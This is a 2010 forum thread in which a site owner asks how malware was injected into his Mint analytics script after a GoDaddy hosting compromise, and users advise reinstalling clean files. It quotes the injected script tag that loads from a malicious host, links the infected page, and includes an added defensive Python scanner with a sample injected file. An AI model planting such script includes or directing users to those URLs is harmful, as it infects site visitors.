Malware inserted into mint js?

Posted on Jun 09, '10 at 10:11 pm

First off, let me just say I know this has nothing to do with Mint. I’ve had it running on my site for some time now without incident. Also, I don’t wish to presume that a matter such as this would be categorized as a legitimate support issue. If that is indeed the case, I understand and apologize.

I just wanted to give a heads up to any other users out there who were unfortunate enough to have chosen Godaddy as their hosting service. If you don’t already know, last month Godaddy were hit by multiple attacks. You can read about them below. http://blog.sucuri.net/2010/05/here-we- … inues.html

My PHP based forum was hit and had to be completely purged. Thankfully, since my coding skills are horribly archaic, my HTML remained unscathed, or so I thought. Today one of my readers informed me that his A/V software flagged one of my HTML based pages. He provided me with the following link: PLEASE DON’T CLICK THIS ON A WINDOWS BASED MACHINE!!! http://crowsxworst.com/mint/?js

Upon closer inspection I noticed the following line of code at the end of the page: };Mint.save…script src=”http://holasionweb.com/oo.php”

Holasion.com were the ones responsible for these previously mentioned attacks. My question is, how the hell is this even possible?! It must have been inserted somewhere into the Mint directory, right? I reviewed a sample of my site’s pages after the attack to be certain it hadn’t been affected, but I never saw anything out of the ordinary. That Mint JavaScript looks completely banal on the surface. Or is it? To be honest, it’s been so long since I installed Mint, I don’t remember the exact snippet.

If there’s a way to quickly delete this without having to remove the mint js from every page, I’d love to know. If nothing else, maybe someone could tell me if that page I provided above is normal except for the final line with the attackers website?

Thank you for your time.

Shaun Inman
Mint/Pepper Developer
Posted on Jun 10, '10 at 10:52 am

Most malware injects code to any index.(html|php|etc) file indiscriminately. If your server was exploited you should delete all compromised files and replace them with pre-exploit versions or in the case of Mint and its Pepper, download fresh copies from the Peppermill.

Posted on Jun 10, '10 at 12:09 pm

I understand that. I was just confused as to how this code was being executed. When I cleaned the forum I could physically SEE the line of malicious code inserted in config.php. Had I not been using a text editor that distinguished URLs and images from other code, I would never have caught this. Upon closer inspection of index.php in my mint directory, I’m still not seeing the attack point. I guess I just don’t really have a grasp as to how the injection actually works. I won’t ask you to elaborate.

So, are you suggesting that I delete the entire mint directory and start from scratch? I won’t actually have to remove the .js from individual page headers?

Posted on Jun 13, '10 at 05:30 pm

I believe that the Mint files were infected, since the current malware that is hitting GoDaddy indiscriminately injects code into all .php files. The infected Mint is probably displaying what you’re seeing as part of the inclusion of /mint/?js on the pages.

In other words, if you clean Mint (and all other .php files), you should be fine. And in most cases, like with Mint for example, you should be able to just re-install the files (it sure beats tediously cleaning every single line of code).
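An added example, not from this thread and not Mint’s own code: a small scanner for the situation described above, where a remote `<script src="http://...">` tag has been appended to index.php and then gets emitted through `/mint/?js`. It flags unexpected remote script tags and, given a fresh download of the same files, any file whose content differs from the pristine copy. The sample site, its file contents and the host `malicious.example` are constructed for the demo; the owner’s own domain is used as the only allowed script host.

```python
import hashlib
import re
from typing import Dict, List, Optional, Set

# Remote <script src="http(s)://..."> tag, the shape of the injected line in the thread.
REMOTE_SCRIPT = re.compile(
    r'<script[^>]*\bsrc\s*=\s*["\']?(https?://[^"\'\s>]+)', re.IGNORECASE)

# Constructed sample site (hypothetical files, made-up malicious host) where
# mint/index.php has had a script tag appended after the legitimate JS output.
SITE = {
    "index.html": '<html><script src="/mint/?js"></script></html>',
    "mint/index.php": ('<?php /* Mint */ ?>}; Mint.save();'
                       '<script src="http://malicious.example/oo.php"></script>'),
    "mint/pepper/config.php": '<?php $cfg = 1; ?>',
}
PRISTINE = {  # constructed "fresh download" of the same files, for comparison
    "mint/index.php": '<?php /* Mint */ ?>}; Mint.save();',
    "mint/pepper/config.php": '<?php $cfg = 1; ?>',
}


def remote_script_hosts(text: str, allowed: Set[str]) -> List[str]:
    """Return remote script URLs whose host is not on the allow list."""
    hits = []
    for m in REMOTE_SCRIPT.finditer(text):
        url = m.group(1)
        host = url.split("/")[2].lower()  # "http://host/path" -> "host"
        if host not in allowed:
            hits.append(url)
    return hits


def scan_site(files: Dict[str, str], pristine: Optional[Dict[str, str]],
              allowed: Set[str]) -> Dict[str, List[str]]:
    """Map each suspicious path to its findings: unexpected remote script tags,
    and (when a pristine copy of that file exists) content that differs from it."""
    findings: Dict[str, List[str]] = {}
    for path, text in sorted(files.items()):
        notes = [f"remote script: {u}" for u in remote_script_hosts(text, allowed)]
        if pristine and path in pristine:
            mine = hashlib.sha256(text.encode()).hexdigest()
            ref = hashlib.sha256(pristine[path].encode()).hexdigest()
            if mine != ref:
                notes.append("differs from pristine copy")
        if notes:
            findings[path] = notes
    return findings


if __name__ == "__main__":
    for path, notes in scan_site(SITE, PRISTINE, {"crowsxworst.com"}).items():
        print(path, "->", "; ".join(notes))
```

Against a real install, read the files from disk into the same dict shape; the pristine comparison is what makes “replace the files” a verifiable step rather than a hopeful one.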

Posted on Jun 16, '10 at 10:12 am

Gotcha. With the forum I simply deleted all .php files then reinstalled. As I said, I’m a (horrible) “90’s coder”, so I assumed the main site was unaffected being html. I completely forgot about Mint.

After being alerted to this issue, I renamed my mint directory in order to keep readers safe. Now I can go about fixing it the proper way. I guess I’ll lose all my previous stats, but that’s not the end of the world.

Thank you for your help. I appreciate it.

Posted on Jun 16, '10 at 01:52 pm

You’re welcome!

As long as you leave the database intact, you won’t lose your stats. Just replace the files and all should be well.

